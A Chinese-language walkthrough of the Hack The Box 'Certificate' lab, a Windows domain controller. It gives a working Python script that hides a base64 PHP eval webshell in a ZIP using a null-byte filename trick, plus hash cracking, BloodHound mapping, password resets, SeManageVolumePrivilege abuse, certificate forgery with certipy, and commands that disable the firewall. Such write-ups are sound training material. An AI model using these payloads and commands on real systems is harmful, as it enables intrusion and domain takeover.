目标信息
IP地址:
10.129.129.191(非固定IP地址)
信息收集
ICMP检测
PING 10.129.129.191 (10.129.129.191) 56(84) bytes of data.
64 bytes from 10.129.129.191: icmp_seq=1 ttl=127 time=401 ms
64 bytes from 10.129.129.191: icmp_seq=2 ttl=127 time=428 ms
64 bytes from 10.129.129.191: icmp_seq=3 ttl=127 time=385 ms
64 bytes from 10.129.129.191: icmp_seq=4 ttl=127 time=344 ms
--- 10.129.129.191 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 343.574/389.503/428.212/30.645 ms攻击机和靶机间网络连通性良好。
防火墙检测
# Nmap 7.95 scan initiated Sun Jun 1 14:19:32 2025 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.129.191
Nmap scan report for 10.129.129.191
Host is up (0.34s latency).
All 65535 scanned ports on 10.129.129.191 are in ignored states.
Not shown: 65535 open|filtered tcp ports (no-response)
# Nmap done at Sun Jun 1 14:20:19 2025 -- 1 IP address (1 host up) scanned in 46.72 seconds无法判断靶机防火墙状态。
网络端口扫描
TCP端口扫描结果
# Nmap 7.95 scan initiated Sun Jun 1 14:22:38 2025 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.129.191
Nmap scan report for 10.129.129.191
Host is up (0.36s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-01 14:24:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T14:25:58+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T14:25:57+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-06-01T14:25:58+00:00; +8h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T14:25:57+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
60590/tcp open msrpc Microsoft Windows RPC
60605/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-01T14:25:20
|_ start_date: N/A
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 343.30 ms 10.10.14.1
2 363.90 ms 10.129.129.191
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 1 14:25:59 2025 -- 1 IP address (1 host up) scanned in 201.47 secondsUDP端口开放列表扫描结果
# Nmap 7.95 scan initiated Sun Jun 1 14:27:43 2025 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.129.191
Nmap scan report for 10.129.129.191
Host is up (0.34s latency).
Not shown: 65531 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
# Nmap done at Sun Jun 1 14:28:28 2025 -- 1 IP address (1 host up) scanned in 45.09 secondsUDP端口详细信息扫描结果
(无)同时发现靶机操作系统为Windows Server 2019,为域控制器,还开放了HTTP服务,主域名为certificate.htb,主机名为dc01。
服务探测
DNS服务(53端口)
尝试使用dig工具查看DNS服务基本信息:
dig any certificate.htb @dc01.certificate.htb
未发现其它信息,尝试爆破子域名,无新域名发现。
Kerberos服务(88端口)
首先使用ntpdate工具和靶机同步时间:
ntpdate -s dc01.certificate.htb随后尝试使用kerbrute工具进行用户名爆破,但未发现除Administrator外的任何用户。
Web应用程序(80端口)
打开主页:http://certificate.htb/
发现目标站点为在线教育平台展示页,主页上存在6个链接,分别指向:index.php、about.php、login.php、register.php、blog.php和contacts.php。在主页中部,发现存在课程介绍栏,点击课程介绍区块会跳转至course-details.php,但需要登录查看:
访问blog.php,发现该页面为高仿论坛页面,所有页面上的帖子链接均为当前地址,还发现疑似存在一个HTTP GET参数search,但无论输入什么,页面都没有变化。
访问contacts.php,发现一个表单:
尝试测试SQLi和XSS漏洞,但不存在;除此之外发现一个电子邮箱support@certificate.htb。
直接点击Register链接,跳转至用户注册界面,注册一个新用户并登录:
登录后跳转至主页,发现页面顶部链接栏新出现了一个链接Courses,点击之后跳转到了courses.php课程选择界面:
随便点击一项课程,跳转至course-details.php课程购买页面,点击Enroll按钮尝试预订课程:
同时发现页面尾部出现了观看课程视频和提交作业的按钮:
点击SUBMIT按钮,发现跳转至了upload.php文件上传页面:
根据页面描述,作业提交页面只允许上传.pdf、.docx、.pptx和.xlsx文件,也可以将一份为上述四种类型之一的文件打包在ZIP压缩包内上传。
渗透测试
ZIP文件名元信息截断绕过
在之前的服务探测过程中,我们已经发现了用于实现作业提交功能的文件上传界面,现在尝试进行上传绕过。首先尝试新建一份TXT文件上传:
发现提示MIME类型错误,尝试更改为application/vnd.openxmlformats-officedocument.wordprocessingml.document类型,提示文件后缀名错误:
经过进一步测试,发现后端程序采用了后缀名和MIME类型相匹配的双重白名单机制,如果后缀名非法或与MIME类型不对应,则无法进行上传。
尝试将文件后缀名改为.docx,发现即使文件后缀名和MIME合法且相符合,程序也会检测文件二进制格式是否合法,即使添加DOCX文件头也无法绕过:
尝试将一个test.txt文件改名为test.docx打包在ZIP压缩包中上传,发现上传成功,文件被自动解压:
经过进一步测试,发现上传ZIP文件时,程序仅会检查压缩包内文件的后缀名,不会检查文件二进制格式合法性。
对于这种情况,我们可以将WebShell打包在压缩包内,使用16进制字符\x00对压缩包文件名元信息字符串进行截断的方法绕过。比如,WebShell名称为sparkle.php,那么我们就可以使用16进制截断字符,变文件名为sparkle.php\x00.docx。这样,由于ZIP压缩包内文件名信息字符串无限制,而NTFS文件系统的文件名有字符限制的原因,程序会检测到后缀名.docx,认为该文件合法,随即调用系统API解压文件;操作系统解压文件时,读取到\x00截断字符,文件名就变为了sparkle.php。
要实现以上效果,我们需要使用Python的zipfile类库,组装ZIP压缩包文件元信息的方法实现:
#!/usr/bin/python3
import base64
import zipfile
php_backdoor_name = f'sparkle.php\x00.docx'
php_backdoor_content = '''
R0lGODlhCjw/cGhwCiAgJGNvZGUgPSAkX1BPU1RbImNvZGUiXTsKICBlY2hvKGV2YWwoJGNvZGUpKTsKPz4K
'''
php_backdoor_content = base64.b64decode(php_backdoor_content).decode("utf-8")
malicious_zipfile_metadata = zipfile.ZipInfo(filename="", date_time=(2025, 6, 4, 10, 3, 0))
malicious_zipfile_metadata.filename = php_backdoor_name
with zipfile.ZipFile("sparkle.zip", "w") as zip_f:
zip_f.writestr(malicious_zipfile_metadata, php_backdoor_content)脚本运行完毕后,将生成的sparkle.zip文件上传:
随后按照规律,使用中国蚁剑工具连接后门:http://certificate.htb/static/uploads/371dcc2325f3edac50d1371fb8b09481/sparkle.php(参数名为code)
后门连接成功!
破解站点用户哈希获得凭据
连接WebShell后,发现虽然后门可以成功运行,但无法正常执行操作系统命令,只能对系统目录下的文件进行查看,于是放弃反弹Shell,转而进行目录信息收集。
经过查看,在靶机网站根目录下发现数据库连接配置脚本:C:\xampp\htdocs\certificate.htb\db.php:
直接查看其内容:
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
?>成功发现数据库连接凭据:
- 数据库地址:
localhost(靶机本地) - 用户名:
certificate_webapp_user - 密码:
cert!f!c@teDBPWD
由于未获得反弹Shell,目前无法直接使用命令行登录数据库,只能使用Adminer在线数据库管理工具进行数据查看:Adminer - Database management in a single PHP file
直接下载该文件,并使用中国蚁剑工具上传:
随后访问http://certificate.htb/static/uploads/371dcc2325f3edac50d1371fb8b09481/adminer.php,输入发现的数据库凭据,点击登录按钮:
成功登录!
登录之后,点击数据库certificate_webapp_db,在数据库内发现了users表,表内存储了站点的用户凭据信息:
查看用户列表,发现用户sara.b的电子邮箱地址刚好为certificate.htb,而C:Users目录下也刚好存在sara.b用户的家目录:
怀疑该网站用户凭据和操作系统内用户有关。直接使用hashcat工具配合rockyou.txt进行破解:
.\hashcat.exe -m 3200 -a 0 "`$2y`$04`$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6" .\rockyou.txt --force
成功发现域用户凭据:
- 域:
certificate.htb - 用户名:
sara.b - 密码:
Blink182
随后使用crackmapexec对该用户凭据进行验证:
crackmapexec smb dc01.certificate.htb -d certificate.htb -u sara.b -p "Blink182"
crackmapexec winrm dc01.certificate.htb -d certificate.htb -u sara.b -p "Blink182"
域用户凭据正确且具有WinRM登录权限,直接使用evil-winrm登录:
evil-winrm -i dc01.certificate.htb -u sara.b -p "Blink182"
登录WinRM成功!!
权限提升
域关系信息收集
登录sara.b用户后,使用BloodHound工具对靶机域环境进行分析。首先需要上传SharpHound.ps1采集脚本收集相关信息:
upload ../../../../../opt/BloodHound-linux-x64/resources/app/Collectors/SharpHound.ps1
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputPrefix "sara.b" -OutputDirectory C:\Users\sara.b\Documents收集完毕后,直接下载采集到的数据:
ls
download sara.b_20250605040605_BloodHound.zip
随后启动neo4j,并将其上传至BloodHound,点击Analysis => Find Shortest Paths to Domain Admins按钮列出域内最短攻击路径:
发现Account Operators用户组内的用户对ryan.k用户对象具有GenericAll完全控制权限。
点击Account Operators用户组对象按钮,查看成员用户,发现当前用户sara.b就在该用户组内:
这意味着当前用户sara.b可直接修改ryan.k用户的凭据,决定利用此条路径进行权限提升。
GenericAll用户权限利用
在域关系信息收集阶段,已经发现当前用户可修改ryan.k用户凭据的情况,现在直接使用Windows操作系统的net工具进行利用:
net user ryan.k Asd310056 /domain
随后直接登录ryan.k用户:
evil-winrm -i dc01.certificate.htb -u ryan.k -p "Asd310056"
成功!
SeManageVolumePrivilege特权利用
登录ryan.k用户后,使用whoami /all命令查看当前用户属组和特权信息,发现该用户开启了SeManageVolumePrivilege特权。该特权允许用户执行磁盘维护操作,包括锁定或装卸载卷、修改卷数据、碎片整理以及运行磁盘清理工具等任务。
对于该特权,我们可以使用如下工具,从C盘根目录开始递归修改系统盘内主要目录的访问控制信息,并通过读取系统关键文件的方式进行提权:CsEnox/SeManageVolumeExploit
由于靶机为Windows Active Directory域控制器,系统内必定安装了AD CS证书服务,我们可以通过certutil工具导出位于C:\Windows\System32\Certlog\CertEnroll下证书颁发机构CA的根证书,随后通过该根证书向CA请求域管理员用户的用户证书,进而获得管理员用户的NTLM哈希值完成提权。
首先下载SeManageVolumeExploit.exe工具,并上传至靶机:
upload SeManageVolumeExploit.exe随后进入CA证书目录,运行特权利用工具,并导出CA根证书,下载到攻击机上:
cd C:\Windows\System32\certsrv\CertEnroll
C:\Users\ryan.k\Desktop\SeManageVolumeExploit.exe
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\ryan.k\Desktop\Certificate-LTD-CA.pfx
download C:\Users\ryan.k\Desktop\Certificate-LTD-CA.pfx
CA根证书导出成功!接下来使用certipy-ad的forge功能请求Administrator用户的证书:
ntpdate -s dc01.certificate.htb
certipy-ad forge -ca-pfx Certificate-LTD-CA.pfx -upn Administrator@certificate.htb -out administrator.pfx成功获取后,使用certipy-ad的auth功能进行证书UnPAC请求利用,获取Administrator用户哈希:
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.71 -domain certificate.htb -username Administrator
成功获取域管理员登录凭据:
- 域:
certificate.htb - 用户名:
Administrator NTLM哈希:d804304519bf0143c14cbf1c024408c6
直接使用crackmapexec执行命令,修改密码、关闭防火墙并打开远程桌面:
crackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -H "d804304519bf0143c14cbf1c024408c6" -x "net user Administrator Asd310056 /domain"
crackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -p "Asd310056" -x "netsh advfirewall set allprofiles state off"
crackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -p "Asd310056" -x "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"最后使用xfreerdp登录远程桌面:
xfreerdp /v:dc01.certificate.htb /u:Administrator /p:"Asd310056" /size:1440x900
提权成功!!!!